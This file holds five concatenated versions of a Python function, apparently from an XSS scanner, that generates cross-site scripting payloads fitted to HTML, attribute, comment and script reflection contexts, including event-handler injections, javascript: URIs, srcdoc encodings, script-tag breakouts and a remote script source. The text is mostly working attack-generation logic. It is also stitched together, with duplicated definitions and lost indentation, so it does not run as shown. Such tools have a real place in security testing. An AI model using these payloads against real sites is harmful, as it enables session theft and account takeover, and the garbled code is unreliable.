def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {
10: set(),
9: set(),
8: set(),
7: set(),
6: set(),
5: set(),
4: set(),
3: set(),
2: set(),
1: set()
}
for i in occurences:
context = occurences[i]['context'][0]
breaker = occurences[i]['context'][1]
special = occurences[i]['context'][2]
if special not in badTags:
special = ''
elif context == 'attribute':
special = '</' + special + '/>'
else:
special = ''
attribute = occurences[i]['context'][3]
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
if breaker == '\'' or breaker == '"':
breaker = ''
breakerEfficiency = 100
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
vectors[10].add(payload)
elif context == 'attribute':
breakerEfficiency = occurences[i]['score'][breaker]
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if greatBracketEfficiency == 100 and breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
if breaker:
payload = payload.replace(breaker, breaker + '>')
else:
payload = '>' + payload
vectors[10].add(payload)
if breakerEfficiency == 100:
for filling in fillings:
for function in functions:
vector = breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + breaker + function
vectors[6].add(vector)
elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
vectors[10].add(payload)
elif context == 'script':
try:
script = scripts[index]
except IndexError:
script = scripts[0]
closer = jsContexter(script)
validBreakers = ['\'', '"', '`']
scriptEfficiency = occurences[i]['score']['</scRipT/>']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if scriptEfficiency == 100:
breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = '//\\'
if not breaker:
closer = closer[1:]
for filling in jFillings:
for function in functions:
vector = closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency >= 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if breaker == '':
filling = ''
vector = '\\' + breaker + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {
11: set(),
10: set(),
9: set(),
8: set(),
7: set(),
6: set(),
5: set(),
4: set(),
3: set(),
2: set(),
1: set()
}
for i in occurences:
context = occurences[i]['context']
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
badTag = occurences[i]['details'][
'badTag'] if 'badTag' in occurences[i]['details'] else ''
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, badTag)
for payload in payloads:
vectors[10].add(payload)
elif context == 'attribute':
found = False
tag = occurences[i]['details']['tag']
Type = occurences[i]['details']['type']
quote = occurences[i]['details']['quote'] or ''
attributeName = occurences[i]['details']['name']
attributeValue = occurences[i]['details']['value']
quoteEfficiency = occurences[i]['score'][
quote] if quote in occurences[i]['score'] else 100
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if greatBracketEfficiency == 100 and quoteEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + '>' + payload
found = True
vectors[9].add(payload)
if quoteEfficiency == 100:
for filling in fillings:
for function in functions:
vector = quote + filling + r('autofocus') + \
filling + r('onfocus') + '=' + quote + function
found = True
vectors[8].add(vector)
if quoteEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + quote + filling + r('autofocus') + filling + \
r('onfocus') + '=' + function + filling + '\\' + quote
found = True
vectors[7].add(vector)
if Type == 'value':
if attributeName == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:
del ends[:]
ends.append('%26gt;')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
found = True
vectors[9].add(payload.replace('<', '%26lt;'))
elif attributeName == 'href' and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r('javascript:') + function)
elif attributeName.startswith('on'):
closer = jsContexter(attributeValue)
quote = ''
for char in attributeValue.split(xsschecker)[1]:
if char in ['\'', '"', '`']:
quote = char
break
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
if quoteEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = '\\' + quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif tag in ('script', 'iframe', 'embed', 'object'):
if attributeName in ('src', 'iframe', 'embed'
) and attributeValue == xsschecker:
payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']
for payload in payloads:
vectors[10].add(payload)
elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r('javascript:') + function)
elif quoteEfficiency == greatBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + '>' + r('</script/>') + payload
found = True
vectors[11].add(payload)
elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
elif context == 'script':
if scripts:
try:
script = scripts[index]
except IndexError:
script = scripts[0]
else:
continue
closer = jsContexter(script)
quote = occurences[i]['details']['quote']
scriptEfficiency = occurences[i]['score']['</scRipT/>']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = 100
if quote:
breakerEfficiency = occurences[i]['score'][quote]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if scriptEfficiency == 100:
breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency > 83:
prefix = ''
suffix = '//'
if breakerEfficiency != 100:
prefix = '\\'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = prefix + quote + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {
11: set(),
10: set(),
9: set(),
8: set(),
7: set(),
6: set(),
5: set(),
4: set(),
3: set(),
2: set(),
1: set(),
}
for i in occurences:
context = occurences[i]["context"]
if context == "html":
lessBracketEfficiency = occurences[i]["score"]["<"]
greatBracketEfficiency = occurences[i]["score"][">"]
ends = ["//"]
badTag = (occurences[i]["details"]["badTag"]
if "badTag" in occurences[i]["details"] else "")
if greatBracketEfficiency == 100:
ends.append(">")
if lessBracketEfficiency:
payloads = genGen(
fillings,
eFillings,
lFillings,
eventHandlers,
tags,
functions,
ends,
badTag,
)
for payload in payloads:
vectors[10].add(payload)
elif context == "attribute":
found = False
tag = occurences[i]["details"]["tag"]
Type = occurences[i]["details"]["type"]
quote = occurences[i]["details"]["quote"]
attributeName = occurences[i]["details"]["name"]
attributeValue = occurences[i]["details"]["value"]
quoteEfficiency = (occurences[i]["score"][quote]
if quote in occurences[i]["score"] else 100)
greatBracketEfficiency = occurences[i]["score"][">"]
ends = ["//"]
if greatBracketEfficiency == 100:
ends.append(">")
if greatBracketEfficiency == 100 and quoteEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + ">" + payload
found = True
vectors[9].add(payload)
if quoteEfficiency == 100:
for filling in fillings:
for function in functions:
vector = (quote + filling + r("autofocus") + filling +
r("onfocus") + "=" + quote + function)
found = True
vectors[8].add(vector)
if quoteEfficiency == 90:
for filling in fillings:
for function in functions:
vector = ("\\" + quote + filling + r("autofocus") +
filling + r("onfocus") + "=" + function +
filling + "\\" + quote)
found = True
vectors[7].add(vector)
if Type == "value":
if attributeName == "srcdoc":
if occurences[i]["score"]["<"]:
if occurences[i]["score"][">"]:
del ends[:]
ends.append("%26gt;")
payloads = genGen(
fillings,
eFillings,
lFillings,
eventHandlers,
tags,
functions,
ends,
)
for payload in payloads:
found = True
vectors[9].add(payload.replace("<", "%26lt;"))
elif attributeName == "href" and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r("javascript:") + function)
elif attributeName.startswith("on"):
closer = jsContexter(attributeValue)
quote = ""
for char in attributeValue.split(xsschecker)[1]:
if char in ["'", '"', "`"]:
quote = char
break
suffix = "//\\"
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
if quoteEfficiency > 83:
suffix = "//"
for filling in jFillings:
for function in functions:
if "=" in function:
function = "(" + function + ")"
if quote == "":
filling = ""
vector = ("\\" + quote + closer + filling +
function + suffix)
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif tag in ("script", "iframe", "embed", "object"):
if (attributeName in ("src", "iframe", "embed")
and attributeValue == xsschecker):
payloads = ["//15.rs", "\\/\\\\\\/\\15.rs"]
for payload in payloads:
vectors[10].add(payload)
elif (tag == "object" and attributeName == "data"
and attributeValue == xsschecker):
for function in functions:
found = True
vectors[10].add(r("javascript:") + function)
elif quoteEfficiency == greatBracketEfficiency == 100:
payloads = genGen(
fillings,
eFillings,
lFillings,
eventHandlers,
tags,
functions,
ends,
)
for payload in payloads:
payload = quote + ">" + r("</script/>") + payload
found = True
vectors[11].add(payload)
elif context == "comment":
lessBracketEfficiency = occurences[i]["score"]["<"]
greatBracketEfficiency = occurences[i]["score"][">"]
ends = ["//"]
if greatBracketEfficiency == 100:
ends.append(">")
if lessBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
elif context == "script":
if scripts:
try:
script = scripts[index]
except IndexError:
script = scripts[0]
else:
continue
closer = jsContexter(script)
quote = occurences[i]["details"]["quote"]
scriptEfficiency = occurences[i]["score"]["</scRipT/>"]
greatBracketEfficiency = occurences[i]["score"][">"]
breakerEfficiency = 100
if quote:
breakerEfficiency = occurences[i]["score"][quote]
ends = ["//"]
if greatBracketEfficiency == 100:
ends.append(">")
if scriptEfficiency == 100:
breaker = r("</script/>")
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = "//\\"
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency > 83:
suffix = "//"
for filling in jFillings:
for function in functions:
if "=" in function:
function = "(" + function + ")"
if quote == "":
filling = ""
vector = "\\" + quote + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {
11: set(),
10: set(),
9: set(),
8: set(),
7: set(),
6: set(),
5: set(),
4: set(),
3: set(),
2: set(),
1: set()
}
for i in occurences:
context = occurences[i]['context'][0]
breaker = occurences[i]['context'][1]
special = occurences[i]['context'][2]
try:
attributeName = list(occurences[i]['context'][3].keys())[0]
attributeValue = list(occurences[i]['context'][3].values())[0]
except AttributeError:
attributeName = occurences[i]['context'][3]
if special not in badTags:
special = ''
elif context == 'attribute':
special = '</' + special + '/>'
else:
special = ''
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
if breaker == '\'' or breaker == '"':
breaker = ''
breakerEfficiency = 100
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
vectors[10].add(payload)
elif context == 'attribute':
found = False
breakerEfficiency = occurences[i]['score'][breaker]
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if greatBracketEfficiency == 100 and breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
if breaker:
payload = payload.replace(breaker, breaker + '>')
else:
payload = '>' + payload
found = True
vectors[6].add(payload)
if breakerEfficiency == 100:
for filling in fillings:
for function in functions:
vector = breaker + filling + 'auTOfOcuS' + \
filling + 'OnFoCUs' + '=' + breaker + function
found = True
vectors[6].add(vector)
if breakerEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \
'OnFoCUs' + '=' + function + filling + '\\' + breaker
found = True
vectors[6].add(vector)
if attributeName == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:
del ends[:]
ends.append('%26gt;')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, '',
'')
for payload in payloads:
found = True
vectors[9].add(payload.replace('<', '%26lt;'))
if attributeName.startswith('on'):
closer = jsContexter(attributeValue)
breaker = ''
for char in attributeValue.split(xsschecker)[1]:
if char in ['\'', '"', '`']:
breaker = char
break
if closer:
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = breaker + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif breakerEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if breaker == '':
filling = ''
vector = '\\' + breaker + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
vectors[10].add(payload)
elif context == 'script':
if scripts:
try:
script = scripts[index]
except IndexError:
script = scripts[0]
else:
continue
closer = jsContexter(script)
scriptEfficiency = occurences[i]['score']['</scRipT/>']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if scriptEfficiency == 100:
breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends,
breaker, special)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = '//\\'
if not breaker:
closer = closer[1:]
if breakerEfficiency != 100:
breaker = ''
for filling in jFillings:
for function in functions:
vector = breaker + closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if breaker == '':
filling = ''
vector = '\\' + breaker + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
for i in occurences:
context = occurences[i]['context'][0]
breaker = occurences[i]['context'][1]
special = occurences[i]['context'][2]
try:
attributeName = list(occurences[i]['context'][3].keys())[0]
attributeValue = list(occurences[i]['context'][3].values())[0]
except AttributeError:
attributeName = occurences[i]['context'][3]
if special not in badTags:
special = ''
elif context == 'attribute':
special = '</' + special + '/>'
else:
special = ''
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
if breaker == '\'' or breaker == '"':
breaker = ''
breakerEfficiency = 100
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special)
for payload in payloads:
vectors[10].add(payload)
elif context == 'attribute':
found = False
breakerEfficiency = occurences[i]['score'][breaker]
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if greatBracketEfficiency == 100 and breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special)
for payload in payloads:
if breaker:
payload = payload.replace(breaker, breaker + '>')
else:
payload = '>' + payload
found = True
vectors[6].add(payload)
if breakerEfficiency == 100:
for filling in fillings:
for function in functions:
vector = breaker + filling + 'auTOfOcuS' + \
filling + 'OnFoCUs' + '=' + breaker + function
found = True
vectors[6].add(vector)
if breakerEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \
'OnFoCUs' + '=' + function + filling + '\\' + breaker
found = True
vectors[6].add(vector)
if attributeName == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:
del ends[:]
ends.append('%26gt;')
payloads = genGen(
fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '')
for payload in payloads:
found = True
vectors[9].add(payload.replace('<', '%26lt;'))
if attributeName.startswith('on'):
closer = jsContexter(attributeValue)
breaker = ''
for char in attributeValue.split(xsschecker)[1]:
if char in ['\'', '"', '`']:
breaker = char
break
if closer:
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = breaker + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif breakerEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if breaker == '':
filling = ''
vector = '\\' + breaker + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special)
for payload in payloads:
vectors[10].add(payload)
elif context == 'script':
if scripts:
try:
script = scripts[index]
except IndexError:
script = scripts[0]
else:
continue
closer = jsContexter(script)
scriptEfficiency = occurences[i]['score']['</scRipT/>']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if scriptEfficiency == 100:
breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = '//\\'
if not breaker:
closer = closer[1:]
if breakerEfficiency != 100:
breaker = ''
for filling in jFillings:
for function in functions:
vector = breaker + closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if breaker == '':
filling = ''
vector = '\\' + breaker + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors